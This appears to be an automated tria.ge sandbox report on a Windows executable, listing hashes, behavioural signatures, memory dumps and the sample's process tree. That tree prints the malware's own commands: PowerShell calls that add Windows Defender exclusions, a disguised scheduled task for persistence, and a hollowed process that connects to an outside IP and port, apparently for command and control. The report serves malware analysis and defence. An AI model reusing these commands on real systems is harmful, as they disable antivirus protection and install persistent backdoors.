Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

3

aac22c5c90...f3.exe

windows7-x64

8

aac22c5c90...f3.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    137s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    28/02/2024, 02:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    aac22c5c90004cfeecd76e274e029ef3.exe

  • Size

    972KB

  • MD5

    aac22c5c90004cfeecd76e274e029ef3

  • SHA1

    eea98faea4d810e940c7d9f62fb8035a0d48b3f6

  • SHA256

    350bcbd13848e76b30da41278a0b0f3c2ca6d9c3b4e5b5cdb64ee24c8c8f9470

  • SHA512

    04cde8b071172a3f8ac5bc3f74dbcff89c2ec3c1b1884e3f6a569d82b0efcf322bbf883cfb056c29b1769688e916c731770acc355fdd5d4c8f59348779005ce3

  • SSDEEP

    12288:45DJZ9aHYol3wwuMx4tbV6LjKm96TVQxbyv99MT5t:45lalbuMWULjKgfyvM

Score
8/10
persistence

Malware Config

Signatures

  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 17 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe
    "C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1640
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2456
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\dAFbvNYf.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2856
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dAFbvNYf" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4615.tmp"
      2⤵
      • Creates scheduled task(s)
      PID:1576
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\dAFbvNYf.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1192
    • C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe
      "C:\Users\Admin\AppData\Local\Temp\aac22c5c90004cfeecd76e274e029ef3.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:2144
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        3⤵
        • Modifies Installed Components in the registry
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:668
        • C:\Windows\system32\ctfmon.exe
          ctfmon.exe
          4⤵
            PID:2716
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 23.105.131.193 8488 sqMUAgrfv
          3⤵
            PID:2704
      • C:\Windows\system32\AUDIODG.EXE
        C:\Windows\system32\AUDIODG.EXE 0x2e4
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:568

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\tmp4615.tmp
        Filesize

        1KB

        MD5

        ebef1d1386438f7f60ad6af0869bc0e5

        SHA1

        e67faa511ad38126b5926c875d7e1ee83a5775aa

        SHA256

        66f16808a8623ad50a1b6d1fcee19f80e477a3fc12a8a3b104bf57d662553c7e

        SHA512

        7df13710bd87d77b95dba30ee69f386ada30cb4a40e861a690536e540d74f6cbe7aab29ecebeb15605b6e3f79c3f718ea83fe3ffc81714535ba5cebf8db7110b

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        Filesize

        7KB

        MD5

        735142286ae920a33baa4dbe5df6b1fb

        SHA1

        ca7e8e459d49aa45b3dfa912b385e29d6ec30f61

        SHA256

        28132ec6b3ec82f9b5c157c5db23e6c5663590214b1dd39038693a124237200b

        SHA512

        91407551ee5f7294992510c90b804ead912717040404a9aff9938cd75e004342ae536a5a9b693b2b1434d0b68cebec39e1103359b24ee7daae88cbaac28d88f2

        Download Submit

      • memory/668-73-0x0000000003D60000-0x0000000003D61000-memory.dmp

        Filesize

        4KB

        Download

      • memory/668-76-0x0000000003D60000-0x0000000003D61000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1192-49-0x00000000027D0000-0x0000000002810000-memory.dmp

        Filesize

        256KB

        Download

      • memory/1192-47-0x000000006EC40000-0x000000006F1EB000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/1192-48-0x000000006EC40000-0x000000006F1EB000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/1192-71-0x000000006EC40000-0x000000006F1EB000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/1192-50-0x00000000027D0000-0x0000000002810000-memory.dmp

        Filesize

        256KB

        Download

      • memory/1640-7-0x00000000007E0000-0x00000000007EE000-memory.dmp

        Filesize

        56KB

        Download

      • memory/1640-4-0x0000000073EE0000-0x00000000745CE000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/1640-1-0x0000000073EE0000-0x00000000745CE000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/1640-2-0x0000000004920000-0x0000000004960000-memory.dmp

        Filesize

        256KB

        Download

      • memory/1640-0-0x0000000000C00000-0x0000000000CF8000-memory.dmp

        Filesize

        992KB

        Download

      • memory/1640-3-0x00000000003F0000-0x0000000000406000-memory.dmp

        Filesize

        88KB

        Download

      • memory/1640-5-0x0000000004920000-0x0000000004960000-memory.dmp

        Filesize

        256KB

        Download

      • memory/1640-6-0x0000000004C90000-0x0000000004D12000-memory.dmp

        Filesize

        520KB

        Download

      • memory/1640-39-0x0000000073EE0000-0x00000000745CE000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/2144-37-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2144-38-0x00000000003D0000-0x00000000003E0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2144-35-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2144-33-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2144-20-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2144-64-0x0000000073EE0000-0x00000000745CE000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/2144-51-0x0000000073EE0000-0x00000000745CE000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/2144-31-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2144-30-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2144-25-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2144-22-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2456-46-0x0000000002210000-0x0000000002250000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2456-42-0x0000000002210000-0x0000000002250000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2456-44-0x000000006EC40000-0x000000006F1EB000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2456-40-0x000000006EC40000-0x000000006F1EB000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2456-72-0x000000006EC40000-0x000000006F1EB000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2456-52-0x0000000002210000-0x0000000002250000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2704-61-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2704-69-0x00000000049F0000-0x0000000004A30000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2704-67-0x0000000000400000-0x0000000000412000-memory.dmp

        Filesize

        72KB

        Download

      • memory/2704-75-0x00000000049F0000-0x0000000004A30000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2704-65-0x0000000000400000-0x0000000000412000-memory.dmp

        Filesize

        72KB

        Download

      • memory/2704-60-0x0000000000400000-0x0000000000412000-memory.dmp

        Filesize

        72KB

        Download

      • memory/2704-58-0x0000000000400000-0x0000000000412000-memory.dmp

        Filesize

        72KB

        Download

      • memory/2704-68-0x0000000073EE0000-0x00000000745CE000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/2704-56-0x0000000000400000-0x0000000000412000-memory.dmp

        Filesize

        72KB

        Download

      • memory/2704-62-0x0000000000400000-0x0000000000412000-memory.dmp

        Filesize

        72KB

        Download

      • memory/2704-74-0x0000000073EE0000-0x00000000745CE000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/2704-54-0x0000000000400000-0x0000000000412000-memory.dmp

        Filesize

        72KB

        Download

      • memory/2856-70-0x000000006EC40000-0x000000006F1EB000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2856-41-0x000000006EC40000-0x000000006F1EB000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2856-45-0x0000000002530000-0x0000000002570000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2856-43-0x000000006EC40000-0x000000006F1EB000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2856-53-0x0000000002530000-0x0000000002570000-memory.dmp

        Filesize

        256KB

        Download